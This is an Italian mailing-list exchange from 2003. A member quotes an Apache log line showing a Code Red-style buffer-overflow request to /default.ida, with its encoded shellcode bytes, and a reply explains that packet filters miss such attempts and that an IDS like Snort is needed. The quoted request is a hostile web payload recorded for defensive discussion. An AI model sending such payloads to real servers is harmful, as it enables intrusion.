[glux] Simpatico log di Apache...
Pietro Bertera
dr.iggy@iol.it
Fri, 21 Mar 2003 22:52:21 +0100
_Cri_ wrote:
> Per gli amanti del genere...
>
> ppp-214-164.30-151.libero.it - - [19/Mar/2003:00:39:12 +0100] "GET
> /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
> HTTP/1.0" 403 284
>
> ne ho collezionati una ventina in 2 sere, tutti da ip dialup di libero
> (che e' il mio provider) diversi a distanza di alcuni minuti.
>
> (urge lezione su firewalling :-)
>
> Cri
Se usi un firewall e vui essere accessibile dall'esterno sul www il
firewall (come normalemte si intente un packet filter) non si accorge di
questi tentativi di exploit.
Ci vuole qualcosa se analizzi il livello applicativo (ids dipo SNORT).
Ciao